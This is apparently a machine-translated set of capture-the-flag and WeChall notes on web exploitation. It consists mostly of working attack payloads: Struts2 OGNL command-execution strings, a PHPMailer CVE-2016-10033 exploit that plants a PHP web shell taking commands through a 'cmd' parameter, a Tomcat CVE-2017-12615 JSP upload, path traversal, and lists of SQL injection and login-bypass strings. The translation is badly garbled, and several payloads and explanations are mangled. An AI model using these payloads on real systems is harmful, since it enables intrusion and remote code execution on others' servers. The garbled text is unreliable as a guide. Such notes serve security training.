The notes to the ink's College, wechall based
s-007
fill information age has found error prompt
fill '+ (# application) +'
found echo, prove the existence of vulnerabilities
payload: '+ (#_memberAccess [ " allowStaticMethodAccess"] = true, # foo = new java .lang.Boolean ( "false"), # context [ "xwork.MethodAccessor.denyMethodExecution"] = # foo, @ org.apache.commons.io.IOUtils @ toString (@ java.lang.Runtime @ getRuntime (). exec ( 'ls /'). getInputStream ())) + '
here' ++ 'for the closed ends of the quotes, ls / is executed, the response is recommended to view burpsuite
s-001
fill in the information, the original discovery information echoes filled
cipher filled% + 1} {1, 2 echo, there are loopholes description
payload:
% A = {# (new new java.lang.ProcessBuilder (new new java.lang.String [] { "ls", "/"})). redirectErrorStream (true) .start (), # b = # a.getInputStream (), # c = new java.io.InputStreamReader (#b ), # d = new java.io.BufferedReader ( #c), # e = new char [50000], # d.read (#e), # f = # context.get ( "com.opensymphony.xwork2.dispatcher .HttpServletResponse "), # f.getWriter () . println (new java.lang.String (#e)), # f.getWriter (). flush (), # f.getWriter (). close ()}
like this species to enter commands needed spaces ',' spaced whoami only if it is new java.lang.String [] { "whoami" })
CVE-2016-10033 PHPMailer
PHPMailer the sendmail mail system function uses a method when sending mail, because there is not enough that the user can filter the code injection attacks
Exp:
"Attacker \" -OQ / tmp the -X-/ var / WWW / HTML / hack.php some "@ example.com construction mailbox
<php @eval ($ _ POST [ shadow]);??> message
will find stuck to send, direct access /hack.php, will be found to have been uploaded successfully, then the chopper connection
word Trojans may be rewritten as <php if (isset ($ _ REQUEST [ 'cmd'])) {$ cmd = ($ _REQUEST [ "cmd"]);? system ($ cmd); echo "$ cmd"; die ;}?>
you can access /hack.php/?cmd= then you can remotely execute commands to get key
After filtration SQL injection characters manually
by replacing = like, and also like url encoding, with / ** / replace spaces, the remaining encoded key url (Digital not required)
PHP includes local vulnerabilities
View source found comment prompted r.php contain variable named p txt, and key in the_key_is_here.txt the
payload: /r.php p = .. / .. / .. / .. / the_key_is_here? with ../ across the directory to read the file
SQLite injected by hand
is still used ', and 1 = 1, and 1 = 2 is determined to
find a digital type implantation, order by N determines the number of fields
union select 1,2, ..., N to see normal echo
union select 1 , name, sql, 4 from sqlite_master burst table and column names (name is the table name, sql column name)
Union SELECT. 1, name, password,. 4 from table limit N, 1 (N> = 0) burst field values
Tomcat remote code execution vulnerability CVE-2017-12615
vulnerability conditions: org.apache.catalina.servlets.DefaultServlet of false readonly to
refresh the page, bp capture, get changed post, address structure /xxx.jsp/ (or jsp% 20, jsp :: $ DATA)
content transfer jsp horse
php global vulnerability wechall
audit found the code: IF (isset ($ the Login))
IF (strtolower ($ the Login [0]) === 'ADMIN') xxx
payload:? globals.php the Login [0] = ADMIN
Limited Access wechall
prompted by the .htaccess file protection
open .htaccess, found:
AuthUserFile .htpasswd
<Limit GET>
payload: burpsuite capture, get change for the post, transfer content .htpasswd
Training: PHP LFI
verification code found in $ filename = 'Pages and the /' (isset ($ _ GET [ "File"]) $ _ GET [ "File"]: "is available for purchase"?) 'HTML.';..
Payload: File =. ./../solution.php%00
Training: Crypto - Caesar II
Title data is given in hexadecimal, binary data is first converted to 10
and then write the program, the digital data array offsets 128 ~ 1 (Subject tips), and finally to the output string
Training: MySQL II
password and username separate authentication, the user name without the filter, bypassing the query construction union select available
payload:
Account: 'union select 1,' admin ', md5 (' password '); #
Password: password
master password extension:
'the UNION ADMIN the Select the Where the FROM 1,1,1' '='
No Escape
core code "UPDATE noescvotes SET` $ who` = `$ who` + 1 WHERE id = 1" Note that this is not `used '
payload: Bill' = 111 -% 20 is
relatively update noescvotes set` bill `= 111 -% 20` =` $ who` + 1 WHERE id = 1 "
Training: Encodings I
entitled to give a bunch of 01 yards, suggesting translated into English, and gives tools
payload: guess is binary, first with binary format grouped by default a group of eight, one more zero, try 7 packet, the packet is completed , then the binary to ascii
Summary injection master password
character:
'or'. 1 '='. 1 / 'or'. 1 '='. 1
'or' '=' / 'or' '='
'Union ADMIN SELECT from the Where 1,1,1' ' = '/ 1 (assuming configuration table is admin id, username, password)
numeric:
' or 1 = 1 # (# can be replaced / or * -)
admin '#
' = '/' = '
Log Analysis
notepad open the log file, the regular matching uploads (*.) (Php | jsp | asp), find uploaded horse and corresponding ip hacker